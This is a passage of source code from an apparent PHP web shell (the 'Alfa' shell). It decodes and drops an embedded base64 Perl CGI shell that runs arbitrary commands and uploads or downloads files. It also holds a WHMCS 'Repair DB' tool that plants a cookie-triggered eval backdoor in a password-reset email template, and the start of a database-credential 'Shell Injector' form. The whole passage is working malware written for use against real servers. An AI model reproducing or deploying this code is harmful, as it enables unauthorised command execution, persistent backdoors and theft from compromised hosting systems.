0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUGVyZm9ybUxvZ2luIA0Kew0KCWlmKCRMb2dpblBhc3N3b3JkIGVxICRQYXNzd29yZCkgIyBwYXNzd29yZCBtYXRjaGVkDQoJew0KCQlwcmludCAiU2V0LUNvb2tpZTogU0FWRURQV0Q9JExvZ2luUGFzc3dvcmQ7XG4iOw0KCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7DQoJCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCX0NCgllbHNlICMgcGFzc3dvcmQgZGlkbid0IG1hdGNoDQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJwIik7DQoJCSZQcmludExvZ2luU2NyZWVuOw0KCQlpZigkTG9naW5QYXNzd29yZCBuZSAiIikgIyBzb21lIHBhc3N3b3JkIHdhcyBlbnRlcmVkDQoJCXsNCgkJCSZQcmludExvZ2luRmFpbGVkTWVzc2FnZTsNCg0KCQl9DQoJCSZQcmludExvZ2luRm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtDQp7DQoJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7DQoJcHJpbnQgPDxFTkQ7DQo8Y29kZT4NCjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImNvbW1hbmQiPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZCIgdmFsdWU9IiRDdXJyZW50RGlyIj4NCiRQcm9tcHQNCjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjIj4NCjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJFbnRlciI+DQo8L2Zvcm0+DQo8L2NvZGU+DQoNCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRGaWxlRG93bmxvYWRGb3JtDQp7DQoJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7DQoJcHJpbnQgPDxFTkQ7DQo8Y29kZT4NCjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZCIgdmFsdWU9IiRDdXJyZW50RGlyIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJkb3dubG9hZCI+DQokUHJvbXB0IGRvd25sb2FkPGJyPjxicj4NCkZpbGVuYW1lOiA8aW5wdXQgdHlwZT0idGV4dCIgbmFtZT0iZiIgc2l6ZT0iMzUiPjxicj48YnI+DQpEb3dubG9hZDogPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkJlZ2luIj4NCjwvZm9ybT4NCjwvY29kZT4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRGaWxlVXBsb2FkRm9ybQ0Kew0KCSRQcm9tcHQgPSAkV2luTlQgPyAiJEN1cnJlbnREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVyTmFtZSAkQ3VycmVudERpcl1cJCAiOw0KCXByaW50IDw8RU5EOw0KPGNvZGU+DQoNCjxmb3JtIG5hbWU9ImYiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPg0KJFByb21wdCB1cGxvYWQ8YnI+PGJyPg0KRmlsZW5hbWU6IDxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmIiBzaXplPSIzNSI+PGJyPjxicj4NCk9wdGlvbnM6ICZuYnNwOzxpbnB1dCB0eXBlPSJjaGVja2JveCIgbmFtZT0ibyIgdmFsdWU9Im92ZXJ3cml0ZSI+DQpPdmVyd3JpdGUgaWYgaXQgRXhpc3RzPGJyPjxicj4NClVwbG9hZDombmJzcDsmbmJzcDsmbmJzcDs8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iQmVnaW4iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iZCIgdmFsdWU9IiRDdXJyZW50RGlyIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJ1cGxvYWQiPg0KPC9mb3JtPg0KPC9jb2RlPg0KRU5EDQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBDb21tYW5kVGltZW91dA0Kew0KCWlmKCEkV2luTlQpDQoJew0KCQlhbGFybSgwKTsNCgkJcHJpbnQgPDxFTkQ7DQo8L3htcD4NCg0KPGNvZGU+DQpDb21tYW5kIGV4Y2VlZGVkIG1heGltdW0gdGltZSBvZiAkQ29tbWFuZFRpbWVvdXREdXJhdGlvbiBzZWNvbmQocykuDQo8YnI+S2lsbGVkIGl0IQ0KRU5EDQoJCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCQlleGl0Ow0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgRXhlY3V0ZUNvbW1hbmQNCnsNCglpZigkUnVuQ29tbWFuZCA9fiBtL15ccypjZFxzKyguKykvKSAjIGl0IGlzIGEgY2hhbmdlIGRpciBjb21tYW5kDQoJew0KCQkjIHdlIGNoYW5nZSB0aGUgZGlyZWN0b3J5IGludGVybmFsbHkuIFRoZSBvdXRwdXQgb2YgdGhlDQoJCSMgY29tbWFuZCBpcyBub3QgZGlzcGxheWVkLg0KCQkNCgkJJE9sZERpciA9ICRDdXJyZW50RGlyOw0KCQkkQ29tbWFuZCA9ICJjZCBcIiRDdXJyZW50RGlyXCIiLiRDbWRTZXAuImNkICQxIi4kQ21kU2VwLiRDbWRQd2Q7DQoJCWNob3AoJEN1cnJlbnREaXIgPSBgJENvbW1hbmRgKTsNCgkJJlByaW50UGFnZUhlYWRlcigiYyIpOw0KCQkkUHJvbXB0ID0gJFdpbk5UID8gIiRPbGREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVyTmFtZSAkT2xkRGlyXVwkICI7DQoJCXByaW50ICIkUHJvbXB0ICRSdW5Db21tYW5kIjsNCgl9DQoJZWxzZSAjIHNvbWUgb3RoZXIgY29tbWFuZCwgZGlzcGxheSB0aGUgb3V0cHV0DQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7DQoJCSRQcm9tcHQgPSAkV2luTlQgPyAiJEN1cnJlbnREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVyTmFtZSAkQ3VycmVudERpcl1cJCAiOw0KCQlwcmludCAiJFByb21wdCAkUnVuQ29tbWFuZDx4bXA+IjsNCgkJJENvbW1hbmQgPSAiY2QgXCIkQ3VycmVudERpclwiIi4kQ21kU2VwLiRSdW5Db21tYW5kLiRSZWRpcmVjdG9yOw0KCQlpZighJFdpbk5UKQ0KCQl7DQoJCQkkU0lHeydBTFJNJ30gPSBcJkNvbW1hbmRUaW1lb3V0Ow0KCQkJYWxhcm0oJENvbW1hbmRUaW1lb3V0RHVyYXRpb24pOw0KCQl9DQoJCWlmKCRTaG93RHluYW1pY091dHB1dCkgIyBzaG93IG91dHB1dCBhcyBpdCBpcyBnZW5lcmF0ZWQNCgkJew0KCQkJJHw9MTsNCgkJCSRDb21tYW5kIC49ICIgfCI7DQoJCQlvcGVuKENvbW1hbmRPdXRwdXQsICRDb21tYW5kKTsNCgkJCXdoaWxlKDxDb21tYW5kT3V0cHV0PikNCgkJCXsNCgkJCQkkXyA9fiBzLyhcbnxcclxuKSQvLzsNCgkJCQlwcmludCAiJF9cbiI7DQoJCQl9DQoJCQkkfD0wOw0KCQl9DQoJCWVsc2UgIyBzaG93IG91dHB1dCBhZnRlciBjb21tYW5kIGNvbXBsZXRlcw0KCQl7DQoJCQlwcmludCBgJENvbW1hbmRgOw0KCQl9DQoJCWlmKCEkV2luTlQpDQoJCXsNCgkJCWFsYXJtKDApOw0KCQl9DQoJCXByaW50ICI8L3htcD4iOw0KCX0NCgkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsNCgkmUHJpbnRQYWdlRm9vdGVyOw0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnREb3dubG9hZExpbmtQYWdlDQp7DQoJbG9jYWwoJEZpbGVVcmwpID0gQF87DQoJaWYoLWUgJEZpbGVVcmwpICMgaWYgdGhlIGZpbGUgZXhpc3RzDQoJew0KCQkjIGVuY29kZSB0aGUgZmlsZSBsaW5rIHNvIHdlIGNhbiBzZW5kIGl0IHRvIHRoZSBicm93c2VyDQoJCSRGaWxlVXJsID1+IHMvKFteYS16QS1aMC05XSkvJyUnLnVucGFjaygiSCoiLCQxKS9lZzsNCgkJJERvd25sb2FkTGluayA9ICIkU2NyaXB0TG9jYXRpb24/YT1kb3dubG9hZCZmPSRGaWxlVXJsJm89Z28iOw0KCQkkSHRtbE1ldGFIZWFkZXIgPSAiPG1ldGEgSFRUUC1FUVVJVj1cIlJlZnJlc2hcIiBDT05URU5UPVwiMTsgVVJMPSREb3dubG9hZExpbmtcIj4iOw0KCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7DQoJCXByaW50IDw8RU5EOw0KPGNvZGU+DQoNClNlbmRpbmcgRmlsZSAkVHJhbnNmZXJGaWxlLi4uPGJyPg0KSWYgdGhlIGRvd25sb2FkIGRvZXMgbm90IHN0YXJ0IGF1dG9tYXRpY2FsbHksDQo8YSBocmVmPSIkRG93bmxvYWRMaW5rIj5DbGljayBIZXJlPC9hPi4NCkVORA0KCQkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgl9DQoJZWxzZSAjIGZpbGUgZG9lc24ndCBleGlzdA0KCXsNCgkJJlByaW50UGFnZUhlYWRlcigiZiIpOw0KCQlwcmludCAiRmFpbGVkIHRvIGRvd25sb2FkICRGaWxlVXJsOiAkISI7DQoJCSZQcmludEZpbGVEb3dubG9hZEZvcm07DQoJCSZQcmludFBhZ2VGb290ZXI7DQoJfQ0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgU2VuZEZpbGVUb0Jyb3dzZXINCnsNCglsb2NhbCgkU2VuZEZpbGUpID0gQF87DQoJaWYob3BlbihTRU5ERklMRSwgJFNlbmRGaWxlKSkgIyBmaWxlIG9wZW5lZCBmb3IgcmVhZGluZw0KCXsNCgkJaWYoJFdpbk5UKQ0KCQl7DQoJCQliaW5tb2RlKFNFTkRGSUxFKTsNCgkJCWJpbm1vZGUoU1RET1VUKTsNCgkJfQ0KCQkkRmlsZVNpemUgPSAoc3RhdCgkU2VuZEZpbGUpKVs3XTsNCgkJKCRGaWxlbmFtZSA9ICRTZW5kRmlsZSkgPX4gIG0hKFteL15cXF0qKSQhOw0KCQlwcmludCAiQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXVua25vd25cbiI7DQoJCXByaW50ICJDb250ZW50LUxlbmd0aDogJEZpbGVTaXplXG4iOw0KCQlwcmludCAiQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9JDFcblxuIjsNCgkJcHJpbnQgd2hpbGUoPFNFTkRGSUxFPik7DQoJCWNsb3NlKFNFTkRGSUxFKTsNCgl9DQoJZWxzZSAjIGZhaWxlZCB0byBvcGVuIGZpbGUNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsNCgkJcHJpbnQgIkZhaWxlZCB0byBkb3dubG9hZCAkU2VuZEZpbGU6ICQhIjsNCgkJJlByaW50RmlsZURvd25sb2FkRm9ybTsNCg0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCX0NCn0NCg0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgQmVnaW5Eb3dubG9hZA0Kew0KCSMgZ2V0IGZ1bGx5IHF1YWxpZmllZCBwYXRoIG9mIHRoZSBmaWxlIHRvIGJlIGRvd25sb2FkZWQNCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwNCgkJKCEkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cLy8pKSkgIyBwYXRoIGlzIGFic29sdXRlDQoJew0KCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7DQoJfQ0KCWVsc2UgIyBwYXRoIGlzIHJlbGF0aXZlDQoJew0KCQljaG9wKCRUYXJnZXRGaWxlKSBpZigkVGFyZ2V0RmlsZSA9ICRDdXJyZW50RGlyKSA9fiBtL1tcXFwvXSQvOw0KCQkkVGFyZ2V0RmlsZSAuPSAkUGF0aFNlcC4kVHJhbnNmZXJGaWxlOw0KCX0NCg0KCWlmKCRPcHRpb25zIGVxICJnbyIpICMgd2UgaGF2ZSB0byBzZW5kIHRoZSBmaWxlDQoJew0KCQkmU2VuZEZpbGVUb0Jyb3dzZXIoJFRhcmdldEZpbGUpOw0KCX0NCgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQ0KCXsNCgkJJlByaW50RG93bmxvYWRMaW5rUGFnZSgkVGFyZ2V0RmlsZSk7DQoJfQ0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgVXBsb2FkRmlsZQ0Kew0KCSMgaWYgbm8gZmlsZSBpcyBzcGVjaWZpZWQsIHByaW50IHRoZSB1cGxvYWQgZm9ybSBhZ2Fpbg0KCWlmKCRUcmFuc2ZlckZpbGUgZXEgIiIpDQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7DQoJCSZQcmludEZpbGVVcGxvYWRGb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCQlyZXR1cm47DQoJfQ0KCSZQcmludFBhZ2VIZWFkZXIoImMiKTsNCg0KCSMgc3RhcnQgdGhlIHVwbG9hZGluZyBwcm9jZXNzDQoJcHJpbnQgIlVwbG9hZGluZyAkVHJhbnNmZXJGaWxlIHRvICRDdXJyZW50RGlyLi4uPGJyPiI7DQoNCgkjIGdldCB0aGUgZnVsbGx5IHF1YWxpZmllZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBjcmVhdGVkDQoJY2hvcCgkVGFyZ2V0TmFtZSkgaWYgKCRUYXJnZXROYW1lID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87DQoJJFRyYW5zZmVyRmlsZSA9fiBtIShbXi9eXFxdKikkITsNCgkkVGFyZ2V0TmFtZSAuPSAkUGF0aFNlcC4kMTsNCg0KCSRUYXJnZXRGaWxlU2l6ZSA9IGxlbmd0aCgkaW57J2ZpbGVkYXRhJ30pOw0KCSMgaWYgdGhlIGZpbGUgZXhpc3RzIGFuZCB3ZSBhcmUgbm90IHN1cHBvc2VkIHRvIG92ZXJ3cml0ZSBpdA0KCWlmKC1lICRUYXJnZXROYW1lICYmICRPcHRpb25zIG5lICJvdmVyd3JpdGUiKQ0KCXsNCgkJcHJpbnQgIkZhaWxlZDogRGVzdGluYXRpb24gZmlsZSBhbHJlYWR5IGV4aXN0cy48YnI+IjsNCgl9DQoJZWxzZSAjIGZpbGUgaXMgbm90IHByZXNlbnQNCgl7DQoJCWlmKG9wZW4oVVBMT0FERklMRSwgIj4kVGFyZ2V0TmFtZSIpKQ0KCQl7DQoJCQliaW5tb2RlKFVQTE9BREZJTEUpIGlmICRXaW5OVDsNCgkJCXByaW50IFVQTE9BREZJTEUgJGlueydmaWxlZGF0YSd9Ow0KCQkJY2xvc2UoVVBMT0FERklMRSk7DQoJCQlwcmludCAiVHJhbnNmZXJlZCAkVGFyZ2V0RmlsZVNpemUgQnl0ZXMuPGJyPiI7DQoJCQlwcmludCAiRmlsZSBQYXRoOiAkVGFyZ2V0TmFtZTxicj4iOw0KCQl9DQoJCWVsc2UNCgkJew0KCQkJcHJpbnQgIkZhaWxlZDogJCE8YnI+IjsNCgkJfQ0KCX0NCglwcmludCAiIjsNCgkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsNCg0KCSZQcmludFBhZ2VGb290ZXI7DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBEb3dubG9hZEZpbGUNCnsNCgkjIGlmIG5vIGZpbGUgaXMgc3BlY2lmaWVkLCBwcmludCB0aGUgZG93bmxvYWQgZm9ybSBhZ2Fpbg0KCWlmKCRUcmFuc2ZlckZpbGUgZXEgIiIpDQoJew0KCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7DQoJCSZQcmludEZpbGVEb3dubG9hZEZvcm07DQoJCSZQcmludFBhZ2VGb290ZXI7DQoJCXJldHVybjsNCgl9DQoJDQoJIyBnZXQgZnVsbHkgcXVhbGlmaWVkIHBhdGggb2YgdGhlIGZpbGUgdG8gYmUgZG93bmxvYWRlZA0KCWlmKCgkV2luTlQgJiAoJFRyYW5zZmVyRmlsZSA9fiBtL15cXHxeLjovKSkgfA0KCQkoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUNCgl7DQoJCSRUYXJnZXRGaWxlID0gJFRyYW5zZmVyRmlsZTsNCgl9DQoJZWxzZSAjIHBhdGggaXMgcmVsYXRpdmUNCgl7DQoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87DQoJCSRUYXJnZXRGaWxlIC49ICRQYXRoU2VwLiRUcmFuc2ZlckZpbGU7DQoJfQ0KDQoJaWYoJE9wdGlvbnMgZXEgImdvIikgIyB3ZSBoYXZlIHRvIHNlbmQgdGhlIGZpbGUNCgl7DQoJCSZTZW5kRmlsZVRvQnJvd3NlcigkVGFyZ2V0RmlsZSk7DQoJfQ0KCWVsc2UgIyB3ZSBoYXZlIHRvIHNlbmQgb25seSB0aGUgbGluayBwYWdlDQoJew0KCQkmUHJpbnREb3dubG9hZExpbmtQYWdlKCRUYXJnZXRGaWxlKTsNCgl9DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiZSZWFkUGFyc2U7DQomR2V0Q29va2llczsNCg0KJFNjcmlwdExvY2F0aW9uID0gJEVOVnsnU0NSSVBUX05BTUUnfTsNCiRTZXJ2ZXJOYW1lID0gJEVOVnsnU0VSVkVSX05BTUUnfTsNCiRMb2dpblBhc3N3b3JkID0gJGlueydwJ307DQokUnVuQ29tbWFuZCA9ICRpbnsnYyd9Ow0KJFRyYW5zZmVyRmlsZSA9ICRpbnsnZid9Ow0KJE9wdGlvbnMgPSAkaW57J28nfTsNCg0KJEFjdGlvbiA9ICRpbnsnYSd9Ow0KJEFjdGlvbiA9ICJsb2dpbiIgaWYoJEFjdGlvbiBlcSAiIik7ICMgbm8gYWN0aW9uIHNwZWNpZmllZCwgdXNlIGRlZmF1bHQNCg0KIyBnZXQgdGhlIGRpcmVjdG9yeSBpbiB3aGljaCB0aGUgY29tbWFuZHMgd2lsbCBiZSBleGVjdXRlZA0KJEN1cnJlbnREaXIgPSAkaW57J2QnfTsNCmNob3AoJEN1cnJlbnREaXIgPSBgJENtZFB3ZGApIGlmKCRDdXJyZW50RGlyIGVxICIiKTsNCg0KJExvZ2dlZEluID0gJENvb2tpZXN7J1NBVkVEUFdEJ30gZXEgJFBhc3N3b3JkOw0KDQppZigkQWN0aW9uIGVxICJsb2dpbiIgfHwgISRMb2dnZWRJbikgIyB1c2VyIG5lZWRzL2hhcyB0byBsb2dpbg0Kew0KCSZQZXJmb3JtTG9naW47DQoNCn0NCmVsc2lmKCRBY3Rpb24gZXEgImNvbW1hbmQiKSAjIHVzZXIgd2FudHMgdG8gcnVuIGEgY29tbWFuZA0Kew0KCSZFeGVjdXRlQ29tbWFuZDsNCn0NCmVsc2lmKCRBY3Rpb24gZXEgInVwbG9hZCIpICMgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlDQp7DQoJJlVwbG9hZEZpbGU7DQp9DQplbHNpZigkQWN0aW9uIGVxICJkb3dubG9hZCIpICMgdXNlciB3YW50cyB0byBkb3dubG9hZCBhIGZpbGUNCnsNCgkmRG93bmxvYWRGaWxlOw0KfQ0KZWxzaWYoJEFjdGlvbiBlcSAibG9nb3V0IikgIyB1c2VyIHdhbnRzIHRvIGxvZ291dA0Kew0KCSZQZXJmb3JtTG9nb3V0Ow0KfQ==';
2918. $solevisible1 = fopen('cgi.alfa','w+');
2919. $solevisible2 = fwrite ($solevisible1 ,base64_decode($solevisible3));
2920. fclose($solevisible1);
2921. chmod('cgi.alfa',0755);
2922. echo '<iframe src=cgialfa/cgi.alfa width=100% height=600px frameborder=0></iframe> ';
2923. echo "</div>";
2924. alfafooter();
2925. }
2926. function alfaWhmcs(){
2927. alfahead();
2928. echo '<div class=header><script>alfa1_=alfa2_="";</script><center><h3><span>| WHMCS TOOLS |</span></h3><center><h3><a href=# onclick="g(\'Whmcs\',null,\'shellinject\',null)">| Shell Injector | </a><a href=# onclick="g(\'Whmcs\',null,null,null,\'repair\')">| Repair DB | </a><a href=# onclick="g(\'Whmcs\',null,null,\'decoder\')">| Whmcs Decoder |</a></h3></center>';
2929. if(isset($_POST['alfa3']) && ($_POST['alfa3'] == 'repair'))
2930. {
2931. echo "<script>alfa3_=alfa6_=alfa7_=alfa8_=alfa9_=alfa10_=\"\";</script><center><table border=0 width='100%'>
2932. <tr><td>
2933. <center><b><font color=\"#FFFF01\">==</font> <font color=\"#00A220\">WHMCS</font> <font color=\"#FFFFFF\">Repair</font> <font color=\"#FF0000\">Table</font><font color=\"#FFFF01\"> ==</font></b></font></center> <br>
2934. <center><form onSubmit=\"g('Whmcs',null,null,null,'repair',null,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value); return false;\" method=POST>
2935. <table border=1>
2936. <tr><td><font face='Arial' color='#FFFFFF'><b>Mysql Host</b></font></td><td><input type=text name=dbh value=localhost size='50' ></td></tr>
2937. <tr><td><font face='Arial' color='#FFFFFF'><b>Db User</b><br></font></td><td><input type=text name=dbu size='50' ></td></tr>
2938. <tr><td><font face='Arial' color='#FFFFFF'><b>Db Name</b><br></font></td><td><input type=text name=dbn size='50' ></td></tr>
2939. <tr><td><font face='Arial' color='#FFFFFF'><b>Db Pass</b><br></font></td><td><input type=text name=dbp size='50' ></td></tr>
2940. </table>
2941. <input type=submit value='>>'></form></center></td></tr></table></center>";
2942. if(isset($_POST['alfa6'])) {
2943. $dbu = $_POST['alfa6'];
2944. $dbn = $_POST['alfa7'];
2945. $dbp = $_POST['alfa8'];
2946. $dbh = $_POST['alfa9'];
2947. $newindex = "<p>Dear {\$client_name},</p><p>Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.</p><p>To reset your password, please visit the url below:<br /><a href=\"{\$pw_reset_url}\">{\$pw_reset_url}</a></p><p>When you visit the link above, your password will be reset, and the new password will be emailed to you.</p><p>{\$signature}</p>{php}if(\$_COOKIE[\"sec\"] == \"123\"){eval(base64_decode(\$_COOKIE[\"sec2\"])); die(\"!\");}{\/php}";
2948. if (!empty($dbh) && !empty($dbu) && !empty($dbn))
2949. {
2950. mysql_connect($dbh,$dbu,$dbp) or die(mysql_error());
2951. mysql_select_db($dbn) or die(mysql_error());
2952. $inject = "UPDATE tblemailtemplates SET message='$newindex' WHERE id='37'";
2953. $result = mysql_query($inject) or die (mysql_error());
2954. echo "<script>alert('Table Repaired :D');</script>";
2955. }
2956. }
2957. }
2958. if(isset($_POST['alfa1']) && ($_POST['alfa1'] == 'shellinject'))
2959. {
2960. echo "<script>alfa2_=alfa3_=alfa6_=alfa7_=alfa8_=alfa9_=alfa10_=\"\";</script><center><table border=0 width='100%'>
2961. <tr><td>
2962. <center><b><font color=\"#FFFF01\">==</font> <font color=\"#00A220\">WHMCS</font> <font color=\"#FFFFFF\">Shell</font> <font color=\"#FF0000\">Injector</font><font color=\"#FFFF01\"> ==</font></b></center><br>
2963. <center><form onSubmit=\"g('Whmcs',null,'shellinject',null,null,null,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,null); return false;\" method=POST>
2964. <table border=1>
2965. <tr><td><font face='Arial' color='#FFFFFF'><b>Mysql Host</b></font></td><td><input type=text name=dbh value=localhost size='50' ></td/></tr>
2966. <tr><td><font face='Arial' color='#FFFFFF'><b>Db User</b><br></font></td><td><input type=text name=dbu size='50' ></td/></tr>
2967. <tr><td><font face='Arial' color='#FFFFFF'><b>Db Name</b><br></font></td><td><input type=text name=dbn size='50' ></td/></tr>
